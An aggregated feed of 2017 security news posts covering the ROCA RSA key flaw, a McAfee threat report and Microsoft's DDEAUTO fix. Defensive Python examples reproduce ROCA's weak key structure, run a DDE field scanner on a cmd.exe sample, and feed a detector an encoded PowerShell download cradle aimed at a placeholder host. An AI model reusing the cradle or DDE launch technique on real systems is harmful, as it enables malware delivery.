As with previous incidents, the leak is another reminder about the mysterious lack of data protection rules in the US. In my opinion, the system leans too lazily on bad publicity to curb weak security when what is needed is independent intervention.



from Naked Security http://ift.tt/2Blua8u

Amazon's Door Lock Is Amazon's Bid to Control Your Home

Interesting essay about Amazon's smart lock:

When you add Amazon Key to your door, something more sneaky also happens: Amazon takes over.

You can leave your keys at home and unlock your door with the Amazon Key app -- but it's really built for Amazon deliveries. To share online access with family and friends, I had to give them a special code to SMS (yes, text) to unlock the door. (Amazon offers other smartlocks that have physical keypads).

The Key-compatible locks are made by Yale and Kwikset, yet don't work with those brands' own apps. They also can't connect with a home-security system or smart-home gadgets that work with Apple and Google software.

And, of course, the lock can't be accessed by businesses other than Amazon. No Walmart, no UPS, no local dog-walking company.

Keeping tight control over Key might help Amazon guarantee security or a better experience. "Our focus with smart home is on making things simpler for customers ­-- things like providing easy control of connected devices with your voice using Alexa, simplifying tasks like reordering household goods and receiving packages," the Amazon spokeswoman said.

But Amazon is barely hiding its goal: It wants to be the operating system for your home. Amazon says Key will eventually work with dog walkers, maids and other service workers who bill through its marketplace. An Amazon home security service and grocery delivery from Whole Foods can't be far off.

This is happening all over. Everyone wants to control your life: Google, Apple, Amazon...everyone. It's what I've been calling the feudal Internet. I fear it's going to get a lot worse.


from Schneier on Security http://ift.tt/2pbqCUu

What do techies really want for Christmas?


We asked some of our friends around Sophos what’s at the top of their Christmas list.

1. Deck the Halls (with flags I stole)

Senior Information Security Engineer, Luke Groves

There are a couple of security related books I’m hoping Santa will bring me. I find the quieter period over Christmas is often a good time to catch up on some reading without too many distractions.

Time permitting, I’m also hoping to have a go at a few online capture the flag challenges. The holiday period usually sees the release of a number of festive challenges giving everyone a chance to put their hacking skills to the test. It’s a great way to learn and it’s fun. If that sort of thing interests you then I would definitely recommend giving one of them a go.

2. Overclockin’ Around The Christmas Tree

Data Scientist, Hillary Sanders

Of the things that those close to me have the power to give, at the very top of my holiday list is just to spend time talking, walking, baking and playing board games with friends and family. But hey, if someone wants to send over a few Monero, Ethereum, or fractions of a Bitcoin my way, I’d be pretty pleased as well!

3. Let it Glow! Let it Glow! Let it Glow!

Service Engineer, Sam Cave

I’d love a new 7-piece screwdriver set for Christmas. I use them for general tech DIY as well as building things at home. Recently I finished making an oak-housed Bluetooth speaker and I’m planning some projects for the new year, but my current set is pretty worn down.

In terms of a nice piece of tech I would be really happy to find a projector under the tree this year. Out of principle I don’t own a TV, to encourage me to get out of the house and be more sociable, but it’s great being able to watch films in 1080p on a 3.5 meter screen.

Finally, the last thing I am after is a heavily modified and powerful laptop that I can connect to my cloud servers with, but that is also lightweight and runs Linux (Arch, not PopOS). That would make me a very happy nerd this year.

4. Silent flight

Threat Researcher, Dorka Palotay

During the Christmas holidays I actually like being as tech free as possible. So, this year at the top of my Christmas list is a ticket to a trampoline park; I can do exercise (without really having to think about it) while getting to throw shapes in mid-air with my family.

We usually play a lot of board games, so a new one is always a great gift to top off the festive family time. But probably I enjoy the meals the most, having the chance to sit around a table with friends or family, eating delicious food and having great conversations.

5. I’ll be Home(ward Bound) for Christmas

Security Specialist, Greg Iddon

I’ll be asking Santa why my request for a talking Golden Retriever has gone unanswered since I first made it in 1993 after watching Homeward Bound: The Incredible Journey. I appreciate that Santa is busy flying around, delivering gifts to less fortunate (man-)children than myself. However, given that we’re now in an age where little AI helpers in tiny Bluetooth speakers are the norm, is it so much to ask that I get a dog that I can have a more intelligent conversation with than half of those had around the Christmas table with inebriated members of my family?

If Santa wants his brandy and mince pies this year, he better cough up! (Rudolf, we’re still good. I won’t skimp on the carrots).


from Naked Security http://ift.tt/2BUCUWA

What does the security industry look like from the inside? [Chet Chat Podcast 267]


In this episode of the Chet Chat podcast, Sophos expert John Shier interviews Claudio Stahnke from Canalys Channel Forums about the view of security from the channel partner’s perspective.

John and Claudio touch on GDPR, security as a service, IoT and more.

If you enjoy the podcast, please share it with other people interested in security and privacy and give us a vote on iTunes and other podcasting directories.



from Naked Security http://ift.tt/2CQLAtN

Security Vulnerability in Apple's HomeKit

The story of the recent vulnerability in Apple's HomeKit.


from Schneier on Security http://ift.tt/2kUeBxz

When to Use Natural and Quick Release When Cooking With Your Instant Pot

The Instant Pot is a table-top multi-cooker with a lot of functions, but its pressure cooking ability is what makes it indispensable for making flavor-packed soups, collagen-rich cuts of meat, and even custardy cheesecakes in super short order. It does, however, have a bit of “black box” mystique about it; food goes in, the Instant Pot is sealed and locked, and—after some period of time—the food comes out, ready to munch on.

Before you can take your meal out, or even open the pot, the pressure has to be released. You can either release it immediately by switching the release valve from “sealing” to “venting” or you can let the Instant Pot de-pressurize on its own, which can take anywhere from five to 25 minutes. During this time, the Instant Pot will switch over to its “keep warm” setting, which may continue to cook the food. (Both methods are super easy, but the above video can walk you through each one.)


Quick release should be used when you need to get that food out fast, i.e., if you’re dealing with easily overcooked proteins (like seafood) or delicate, quick-cooking vegetables (like corn or bok choy). The natural release is mainly used to keep your kitchen counters a bit cleaner. The pressure inside the Instant Pot can cause foods with a lot of liquid to foam, and that foam can shoot out in a most alarming fashion, so use this kind of release for soups, stews, or porridges. If you don’t want to wait 25 minutes (or are worried about food overcooking) let the Instant Pot release naturally for 10 minutes and then do a quick release to get that last bit of pressure out of there.


from Lifehacker http://ift.tt/2BnZmb9

Happy holidays – and don’t get scammed! [VIDEO]


Looking for digestible, not-too-technical holiday season security advice?

Here’s a video that gives you some handy tips that you can use yourself, or pass on to friends and family so they don’t get scammed while they’re supposed to be enjoying themselves.

(Can’t see the video directly above this line? Watch on Facebook instead.)

Note. With most browsers, you don’t need a Facebook account to watch the video, and if you do have an account you don’t need to be logged in. If you can’t hear the sound, try clicking on the speaker icon in the bottom right corner of the video player to unmute.



from Naked Security http://ift.tt/2kmgpQp

Monday, December 18, 2017

Why cryptography is much harder than software engineers think

The recent ROCA vulnerability (CVE-2017-15361) raises some important issues about the design of secure cryptographic software. In this case the vulnerability is not an obvious coding error such as a buffer overflow, or the use of a poor-quality random number generator.

In this case, it arose from what probably seemed like a reasonable software engineering decision. To understand this in detail requires some pretty complex mathematics. For that, I refer you to the paper that details the flaw along with the exploit, which you can download here.

In summary, the researchers studied the statistical properties of a large sample of public keys. These are not normally easy to obtain, but the Estonian government had set up a public directory, associated with their national ID card. Since, by definition, these are public keys, that’s a perfectly reasonable thing to do. Recall that there is a corresponding private key which is of course not disclosed. In theory, it’s almost impossible to derive the private key from the public key unless enormous amounts of computer time are expended.

Researchers analyzed the statistical properties of these public keys. They found that the keys were not truly random, as they should be. This meant that it was possible to derive the private key from the public key in CPU-days (for 1024-bit keys) to CPU-years (for 2048-bit keys) of work that parallelises trivially, rather than the many millennia a properly generated key should cost.

Prime suspects

How did these weak keys come to be generated? The issue is not with the RSA algorithm itself, which lies at the heart of public key cryptography, but with how the primes that feed it were produced. Recall that the public and private keys are generated from very large prime numbers. Five is a prime number (it can be divided only by itself and 1). Six is not (it can be divided by 1, 2, 3 and 6).

A best-practice RSA implementation requires that these primes (which run to hundreds of decimal digits: 1024 bits each for a 2048-bit key) have certain additional properties, which means that not just ANY large prime number will do.

Generating a random prime means producing candidates and testing them, and most candidates are discarded cheaply because they have a small factor. On a slow chip even that adds up, so shortcuts are tempting. The Infineon library took one: rather than sieving random candidates, it constructed every candidate as p = k·M + (65537^a mod M), where M is the product of many small primes (a “primorial”) and k and a are random. A number of that form is automatically coprime to every prime in M, so no primality test is ever wasted on a candidate with a small factor.

The price is that p mod M can take only as many values as there are powers of 65537 modulo M, a tiny fraction of the residues a genuinely random prime could have. The primes were still huge, and still prime, but they were drawn from a much smaller and highly structured set, and the structure carries straight through to the public modulus n = p·q, where the researchers could detect it statistically.

The major key

The researchers could exploit this lack of true randomness. Because n ≡ 65537^(a+b) (mod M), an attacker can recover a+b from the public modulus with a discrete logarithm in the small subgroup generated by 65537, iterate over the possible values of a, and for each guess know p modulo M exactly. With that much of p known, Coppersmith’s method for finding small roots of modular polynomials recovers the rest of p, and hence the private key, from the public key alone.
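The two previous sections, the structured primes and the fingerprint they leave on n, can be reproduced in a few dozen lines. The code below is an added example, not the researchers’ tool: it builds a key the flawed way with toy parameters (M = 47#, 128-bit primes, a fixed seed; the real generator used much larger primorials, e.g. all primes up to 167 for 512-bit primes) and then runs the public-key-only fingerprint test on it and on an honest key made from two ordinary primes. The honest key is constructed for the demo.

```python
"""
Toy reconstruction of the ROCA key structure and its fingerprint test.
Added example, not the researchers' code.  Toy parameters: M is 47# here and
the primes are 128 bits; real keys and primorials are far larger.
"""
import math
import random
from typing import Tuple

SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47]
M = math.prod(SMALL_PRIMES)   # the primorial 47#
G = 65537                     # base used by the flawed generator (also RSA's usual e)


def is_probable_prime(n: int) -> bool:
    """Miller-Rabin with fixed bases; deterministic for n < 3.3e24, enough here."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def roca_style_prime(bits: int, rng: random.Random) -> int:
    """
    The shortcut: every candidate is p = k*M + (65537^a mod M).  Such a p is
    automatically coprime to every prime dividing M, so the generator never
    spends a primality test on a candidate with a small factor.  The price is
    that p mod M can only take |<65537> mod M| values instead of phi(M).
    """
    k_bits = bits - M.bit_length()
    while True:
        a = rng.randrange(1, 1 << 20)
        k = rng.getrandbits(k_bits) | (1 << (k_bits - 1))   # pin the size of p
        p = k * M + pow(G, a, M)
        if is_probable_prime(p):
            return p


def make_roca_style_key(bits: int, seed: int) -> Tuple[int, int, int]:
    """Return (n, p, q) with both primes built the flawed way."""
    rng = random.Random(seed)
    p = roca_style_prime(bits // 2, rng)
    q = roca_style_prime(bits // 2, rng)
    return p * q, p, q


def residues_mod(r: int) -> frozenset:
    """All values 65537^i mod r: the only residues a ROCA-style p, q or n can have mod r."""
    seen, x = set(), 1
    while x not in seen:
        seen.add(x)
        x = x * G % r
    return frozenset(seen)


RESIDUE_TABLE = {r: residues_mod(r) for r in SMALL_PRIMES}


def has_roca_fingerprint(n: int) -> bool:
    """
    p = 65537^a and q = 65537^b (mod M) give n = 65537^(a+b) (mod M), so n mod r
    must lie in <65537> for every prime r | M.  An honestly random modulus lands
    in that subgroup mod r only with probability |<65537>|/(r-1), and the product
    over all r makes an accidental match vanishingly unlikely.
    """
    return all(n % r in RESIDUE_TABLE[r] for r in SMALL_PRIMES)


# Honest key from two ordinary primes (constructed for the demo).  It fails the
# fingerprint already at r = 11: n = 9 (mod 11) but <65537> mod 11 = {1, 10}.
HONEST_N = 1000000007 * 998244353

if __name__ == "__main__":
    n, p, q = make_roca_style_key(256, seed=2017)
    print("gcd(p, M) =", math.gcd(p, M), "(always 1 by construction)")
    print("toy ROCA key fingerprint:", has_roca_fingerprint(n))
    print("honest key fingerprint:  ", has_roca_fingerprint(HONEST_N))
```

The fingerprint is the part anyone can run on a public key, and it is how the researchers’ detection tool works. The recovery step is the expensive part: guess a, set p = k·M + (65537^a mod M) with k unknown, and run Coppersmith to find k; with a real-sized M that is feasible for 512- to 2048-bit keys, which is why the structure is fatal rather than merely untidy.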

Infineon are unlikely to be the only vendor that has taken a shortcut of this kind. The researchers went on to examine other sources of public keys, including keys generated by Trusted Platform Modules (TPMs), the hardware chips used to generate and manage keys securely. The TPMs in question were Infineon parts running the same library, and this is what the researchers said about them:

We analyzed a sample of 41 different laptop models equipped with TPM chips…. All chips [from]… 2013 or later were vulnerable, including both TPM 1.2 and TPM 2.0.

TPM devices have very limited computational resources. Consequently, the code they use to generate and test random primes must be heavily optimized. This matters because the keys generated by TPMs are often used to support full disk encryption systems such as Microsoft’s BitLocker. If the keys are weak, an attacker can potentially recover the encrypted data.

The researchers point out that obtaining large-scale databases of public keys is not easy. Consequently there could be a lot of weak keys out there that have not yet been identified. Recall that Infineon used a particular ‘shortcut’ to optimize the tests for candidate primes. Other vendors may have used different shortcuts that expose their generated keys to a similar weakness.

Without a database of public keys all generated by the same algorithm, it’s hard to tell whether a specific key is weak. The researchers have a test for Infineon-generated keys, but for other vendors, presumably with different algorithmic shortcuts, the test would differ. This may therefore be a more widespread problem.

Most software engineers are not well-versed on cryptographic design, which requires strengths in both math and statistics. In writing the code that introduced the flaw, the engineers probably took some existing implementation and adapted it, based on reasonable considerations of efficiency – they were constrained for resource and made what seemed like a sound decision. Unfortunately, in doing so they introduced a subtle but critical flaw.

The challenge of implementation

It would have been possible to detect this through automated tests against a large set of generated keys, although not necessarily with a generic bit-level randomness test: the raw key bits still look random, because k is random. The anomaly appears only when you look at the keys modulo small primes, which is exactly how the researchers found it, and a test of that kind run over a batch of keys from the flawed generator would have failed immediately.

But this vulnerability highlights how hard cryptography is to implement securely. There is no simple test to say that an implementation is intrinsically secure. Instead, security must be implemented by design. Open source implementations such as OpenSSL have the huge advantage that the code base can be publicly audited by security professionals. Indeed, as far as we know, keys generated by OpenSSL are cryptographically secure. However, closed platform implementations such as the Infineon TPM code are not auditable.

Note that the researchers did NOT reverse-engineer the Infineon devices. They merely examined the generated public keys for statistical anomalies and from these were able to infer the cryptographic weakness. Had the code been in the public domain this weakness may well have been discovered through code auditing. So – if your security depends on vendor-supplied ‘black boxes’ – be very careful. As this incident shows, security through obscurity is no security at all.


from Help Net Security http://ift.tt/2yVHWwo

Exploits and fileless malware drive record new malware surge

McAfee released its McAfee Labs Threat Report: December 2017, examining the growth and trends of new malware, ransomware, and other threats in Q3 2017.


McAfee Labs saw malware reach an all-time high of 57.6 million new samples – four new samples per second – featuring developments such as new fileless malware using malicious macros, a new version of Locky ransomware dubbed Lukitus, and new variations of the banking Trojans Trickbot and Emotet. Threats attempting to exploit Microsoft technology vulnerabilities were very prominent despite the fact that the platform vendor addressed these issues with patches as early as the first quarter of 2017.

“The third quarter revealed that attackers’ threat designs continue to benefit from the dynamic, benign capabilities of platform technologies like PowerShell, a reliable recklessness on the part of individual phishing victims, and what seems to be an equally reliable failure of organizations to patch known vulnerabilities with available security updates,” said Raj Samani, McAfee’s Chief Scientist. “Although attackers will always seek ways to use newly developed innovations and established platforms against us, our industry perhaps faces a greater challenge in the effort to influence individuals and organizations away from becoming their own worst enemies.”

Known vulnerabilities exploited

The third quarter of 2017 saw cybercriminals continue to take advantage of Microsoft Office vulnerabilities such as CVE-2017-0199, a flaw in the way Microsoft Office and WordPad handle specially crafted files that allows remote code execution. To execute this attack, many used a tool available via GitHub that offers an easy route to creating a backdoor without complex configuration.

New variations of the Trickbot banking Trojan featured code that embedded the EternalBlue exploit responsible for the massive WannaCry and NotPetya ransomware outbreaks in Q2. Despite Microsoft’s continued efforts to counter EternalBlue with security patches, the new Trickbot authors still found the proven technique to be effective. They combined it with new features such as cryptocurrency theft and new delivery methods, and made these new Trickbot versions the most active banking Trojans in Q3.

“Once vulnerabilities are discovered and disclosed ‘into the wild,’ or the hacker community, they present a blueprint for malicious parties seeking to develop sophisticated threats that exploit them,” said Steve Grobman, CTO at McAfee. “The year 2017 will be remembered as the time when such vulnerabilities were exploited to orchestrate large-scale cyber events, including the WannaCry and NotPetya ransomware outbreaks, and high-profile breaches such as at Equifax. Only by investing more in the discovery and remediation of cyber vulnerabilities can technology vendors, governments, and business enterprises hope to gain a step on the cybercriminals working furiously to uncover and take advantage of them.”

Fileless threats

Fileless threats continued to be a growing concern in Q3, with PowerShell malware growing by 119%. Very prominent in this category was the Emotet banking Trojan, which spread around the world through large spamming campaigns that lured users into downloading Microsoft Word documents. Opening the document and enabling its macro launches PowerShell, which downloads and installs the malware on the system.

“Although many cyberattacks continue to rely on the exploitation of basic security vulnerabilities, exposures, and user behaviors, fileless threats leverage the utility of our own system capabilities,” said Vincent Weafer, Vice President for McAfee Labs. “By leveraging trusted applications or gaining access to native system operating tools such as PowerShell or JavaScript, attackers have made the development leap forward to take control of computers without downloading any executable files, at least in the initial stages of the attack.”
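The chain described above (Word document, macro, PowerShell, download) leaves a recognisable trace in process-creation telemetry. Below is an added example, not McAfee’s detection logic, that scores events shaped like Sysmon Event ID 1 records (ParentImage, Image, CommandLine) on two signals: an Office application spawning a script host, and a PowerShell command line that carries an -EncodedCommand payload or a download cradle. The events, including the base64 payload and the example.invalid URL, are constructed here for the demo.

```python
"""
Score process-creation events for the Office -> PowerShell -> download pattern.
Added example, not McAfee's code.  Events are constructed in the shape of
Sysmon Event ID 1 fields; nothing here touches the network.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Strings that make a PowerShell command look like a download cradle.
CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|IEX\b|"
    r"Invoke-Expression|BitsTransfer)",
    re.IGNORECASE,
)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the UTF-16LE script text; undo both layers."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons = []
    parent, image = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    # Match the cradle against the decoded script when there is one, so the
    # base64 wrapper does not hide it.
    if CRADLE.search(decoded if decoded is not None else cmd):
        reasons.append("download cradle in command line")
    return reasons


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


def encoded(script: str) -> str:
    """Build the -enc argument the way an attacker (or admin) would."""
    return base64.b64encode(script.encode("utf-16le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events: a scheduled backup, an admin's harmless encoded
# one-liner, and the Emotet-style chain.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": "powershell.exe -enc " + encoded("Get-Process | Sort-Object CPU")},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -nop -enc "
     + encoded("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
]

if __name__ == "__main__":
    for idx, reasons in triage(EVENTS):
        print(f"event {idx}: {'; '.join(reasons)}")
```

The parent/child pair alone is a strong signal; the encoded-command decode is what lets the cradle match fire even when the script body is base64, which is how most macro droppers ship it.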

Lukitus ransomware

One of the key developments in the ransomware space was the emergence of Lukitus, a new version of Locky ransomware. The ransomware was distributed by more than 23 million spam emails within the first 24 hours of the attack. Overall in the category, new ransomware samples increased by 36%. The number of total ransomware samples has grown 44% in the past four quarters to 12.3 million samples.

DragonFly: New industries, new objectives

The McAfee Advanced Threat Research team found that DragonFly 2.0, the malware discovered earlier in 2017 in the energy sector, has targeted organizations beyond original discoveries, including the pharmaceutical, financial services, and accounting industries. These attacks were initiated through spear-phishing emails, luring recipients to click on links that download the Trojan and provide attackers with network access.

“The actors involved in the DragonFly 2.0 attacks have a reputation for initiating attacks for the purpose of conducting reconnaissance on the inner workings of targeted sectors—with energy and pharmaceutical confirmed as top priorities,” said Christiaan Beek, McAfee Lead Scientist and Principal Engineer. “The intellectual property and insider insights they obtain upon gaining access to targeted sectors is of tremendous economic value.”


Q3 2017 threat activity

Security incidents. McAfee Labs counted 263 publicly disclosed security incidents in Q3, a decrease of 15% from Q2. More than 60% of all publicly disclosed security incidents in Q3 took place in the Americas.

Vertical industry targets. The health and public sectors accounted for more than 40% of total incidents in Q3.

  • North America. Health sector attacks continued to lead vertical sectors in Q3 security incidents.
  • Asia. Public sector, followed by technology and individual attacks led in reported Q3 incidents.
  • Europe, Oceania and Africa. Public sector attacks led reported Q3 incidents.

Attack vectors. Account hijacking led disclosed attack vectors, followed by leaks, malware, DDoS, and targeted attacks.

Mobile malware. Total mobile malware continued to grow, reaching 21.1 million samples. New mobile malware increased by 60% from Q2, largely due to a rapid increase in Android screen-locking ransomware.

Malware overall. New malware samples increased in Q3 to 57.5 million, a 10% increase. The total number of malware samples grew 27% in the past four quarters to almost 781 million samples.

Fileless malware. While JavaScript malware growth slowed by 26% in Q3, PowerShell malware more than doubled with 119%.

Ransomware. New ransomware samples rose by 36% in Q3. The total number of new ransomware samples grew 14% in the last quarter to 12.2 million samples.

Mac malware. Mac OS malware samples increased by 7% in Q3.

Macro malware. Total macro malware continued to grow, increasing by 8% in Q3.

Spam campaigns. The Gamut botnet remains the most prevalent spamming botnet during Q3, with the Necurs botnet a close second. Necurs proliferated several Ykcol (Locky) ransomware campaigns throughout the quarter with themes such as “Status Invoice,” “Your Payment,” and “Emailing: [Random Numbers] JPG.”


from Help Net Security http://ift.tt/2AXg2lA

Microsoft Word slams the door on DDEAUTO malware attacks

Remember the DDEAUTO vulnerability?

DDEAUTO, short for automatic dynamic data exchange, is a command you can put right inside the data of an Office file to get it to pull data out of another file.

According to Microsoft’s official documentation, DDEAUTO is only supposed to work within the same app, or between two apps that are already active:

DDEAUTO argument-1 argument-2 [argument-3] [switches]

[. . .]

Description: For information copied from another application, 
this field links that information to its original source file 
using DDE and is updated automatically. 

The application name shall be specified in argument-1; 
this application must be running. 

For example, you could have a Word report that pulled in the latest sales figures “live” from an Excel spreadsheet, provided you had both Word and Excel open already.

But researchers found that there was an undocumented feature in the DDEAUTO function whereby it could start any application already installed on your computer, such as the command shell CMD.EXE.

Having fired up this second program, the DDEAUTO function could be used to run a script specified inside the DDEAUTO command itself, instead of reading data from an existing file, as intended.

In other words, a crook could embed malware, in the form of a Powershell or other script, right in the data of a Word document or an Excel spreadsheet, and just opening the file would launch the malware command – without waiting for you to open an attachment, download a file or enable Word macros.

In short, remote code execution, or RCE.
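A mail gateway or an analyst can look for the field before Word ever sees the document. Below is an added example, not Sophos’s detection logic, that unzips a .docx, reassembles every field instruction in word/*.xml and reports those that begin with DDE or DDEAUTO. The three documents it runs on are built in memory for the demo (just enough of a .docx for the scanner, not enough for Word to open); the cmd.exe payload in the “split” sample only echoes a string.

```python
"""
Find DDE/DDEAUTO field codes inside a .docx without opening it in Word.
Added example, not Sophos detection code.  Sample documents are constructed
in memory from a minimal document.xml, so the script runs offline.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
# Word ignores case and tolerates leading whitespace or a quote before the
# keyword, so match loosely: DDE or DDEAUTO at the start of the instruction.
DDE_FIELD = re.compile(r'^\s*["\']?\s*DDE(AUTO)?\b', re.IGNORECASE)


def field_instructions(document_xml: bytes) -> List[str]:
    """
    Return every field instruction in the XML, reassembled.
    Complex fields are spread over runs: <w:fldChar begin/>, one or more
    <w:instrText> pieces, then <w:fldChar separate/> or <w:fldChar end/>.
    Attackers split the keyword over several instrText runs ("DD" + "EAUTO")
    to dodge naive greps, so pieces are concatenated per field before matching.
    """
    root = ET.fromstring(document_xml)
    fields, current, inside = [], [], False
    for el in root.iter():                      # document order
        if el.tag == W + "fldSimple":           # single-element field form
            fields.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                current, inside = [], True
            elif kind in ("separate", "end") and inside:
                fields.append("".join(current))
                inside = False
        elif el.tag == W + "instrText" and inside:
            current.append(el.text or "")
    return fields


def find_dde_fields(docx_bytes: bytes) -> List[str]:
    """Field instructions that would trigger a DDE request when the file opens."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        # Headers, footers and footnotes are separate parts and can carry
        # fields too, so scan every XML part under word/, not just document.xml.
        for name in z.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                hits += [f for f in field_instructions(z.read(name)) if DDE_FIELD.search(f)]
    return hits


def make_docx(paragraph_xml: str) -> bytes:
    """Wrap run XML in a minimal document.xml and zip it (constructed for the demo)."""
    doc = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        f"<w:body><w:p>{paragraph_xml}</w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", doc)
    return buf.getvalue()


def instr(text: str) -> str:
    return f"<w:r><w:instrText>{text}</w:instrText></w:r>"


FLD_BEGIN = '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
FLD_SEP = '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
FLD_END = '<w:r><w:fldChar w:fldCharType="end"/></w:r>'

# Constructed samples: an ordinary DATE field, a DDEAUTO field whose keyword is
# split across two runs, and the documented Word-to-Excel link as a fldSimple.
BENIGN = make_docx(FLD_BEGIN + instr(" DATE ") + FLD_SEP
                   + "<w:r><w:t>2017-12-18</w:t></w:r>" + FLD_END)
SPLIT_DDE = make_docx(FLD_BEGIN + instr(" DDE")
                      + instr(r'AUTO c:\windows\system32\cmd.exe "/c echo harmless" ')
                      + FLD_END)
EXCEL_LINK = make_docx('<w:fldSimple w:instr=" DDEAUTO excel &quot;sales.xlsx&quot; '
                       '&quot;Sheet1!R1C1&quot; "/>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("split", SPLIT_DDE), ("excel", EXCEL_LINK)):
        print(label + ":", find_dde_fields(doc) or "no DDE fields")
```

The legitimate Excel link is reported as well: from outside the document you cannot tell which application a DDE field will start until Word tries, which is exactly why blocking DDE in the application is the right fix. RTF files carry the same instruction inside `{\field{\*\fldinst ...}}` groups and need their own parser.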

Fortunately, you’d get two DDE warnings before the malicious script would run, but they weren’t warnings that anyone had previously learned to associate with malware.

First, a dialog asking whether to update the document’s links to other files, followed by something along the lines of a prompt asking whether to start the application named in the field.

Microsoft demurred over fixing this bug, describing it as a by-design feature – which it was, except for failing to enforce the restriction stated in the Microsoft Developer Network (MSDN) documentation, namely that “[the other] application must [already] be running”.

Cybercrooks quickly learned to exploit DDEAUTO as yet another route for introducing malware – one that few users were trained to look out for and avoid.

Sophos products block DDE attacks under the following names:

  • CXmail/OffDDE-*: emailed attachments and booby-trapped messages.
  • Troj/RtfDDE-*: booby-trapped RTF files.
  • Troj/DocDl-DJV: DDE attacks that try to download additional malware.

Change of heart

The good news is that Microsoft seems to have had a change of heart, at least in part.

I didn’t notice the details until now – as a macOS user, I get away without needing either Windows or Office in daily life! – but it turns out that downloads published in the December 2017 Update Tuesday included ADV170021, a so-called Microsoft Office Defense in Depth Update:

Microsoft has released an update for Microsoft Office that provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word.

Unfortunately, this isn’t a complete patch against your DDEAUTO problems, because it’s specific to the Word app, rather than generic to all the apps in the Office suite.

If you want to block DDEAUTO in other Office apps you will need to follow the app-specific registry hacks detailed in the Microsoft Office Security Advisory 4053440.

Nevertheless, this ADV170021 patch is a welcome change that introduces the following registry entry for Word:

HKEY_CURRENT_USER\Software\Microsoft\Office\<version#>\Word\Security\AllowDDE = 0

The default value, as indicated above, is zero, meaning that DDE is turned off altogether.

If that doesn’t work for you, you can revert to the old, insecure behaviour by setting AllowDDE = 2, allowing all DDEAUTO commands issued from inside Word.

For a middle ground, AllowDDE = 1 sets the as-originally-documented behaviour, so that DDEAUTO is allowed, but only between apps that are already running.

That means you can still hook your Word documents up to Excel spreadsheets for financial and similar data, but crooks can’t send in documents from outside to trick Word into running dangerous external programs such as CMD.EXE and PowerShell.



from Naked Security http://ift.tt/2BbaFTS